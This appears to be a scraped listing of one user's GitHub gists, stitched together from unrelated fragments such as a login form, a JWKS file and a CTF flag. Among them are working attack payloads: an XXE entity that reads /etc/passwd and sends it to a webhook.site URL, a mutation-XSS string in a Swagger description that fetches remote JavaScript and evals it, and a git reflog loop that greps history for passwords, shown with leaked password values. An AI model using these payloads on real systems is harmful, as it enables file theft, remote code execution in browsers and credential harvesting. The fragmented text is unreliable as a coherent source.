Aj Dumanhug ajdumanhug

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Vulnerable JavaScript Example</title>
<script>
const secret = "SuperSecret123";
function login() {
ajdumanhug / index.html
Created September 20, 2023 18:45
Simple Login Form Animated
<div class="login">
<div class="form">
<h2>NOT WORKING YET!</h2>
<h3>Login</h3>
<input type="text" placeholder="Username">
<input type="password" placeholder="Password">
<input type="submit" value="Sign In" class="submit">
</div>
</div>
ajdumanhug / jwks.json
Last active September 20, 2023 18:00
{
"keys": [
{
"alg": "RS256",
"x5c": [
"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"
]
}
]
}
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b/?data=%file;'>">
%xxe;
{
"url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml",
"name": "Foo"
}
]
}
alert(/XSS by AJ/);
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=fetch('https://gist.githubusercontent.com/ajdumanhug/5026beb333226700c029b46324234e17/raw/357a217fb6499a2bce747e7d545fc84f3f77b921/xss.js').then(function(res){res.text().then(function(data){eval(data)})}) src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
[
{
"text": "RC15{34zy_cLi3n7_s1d3_ch4ll3n63}",
"author": "AJ Dumanhug"
}
]

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...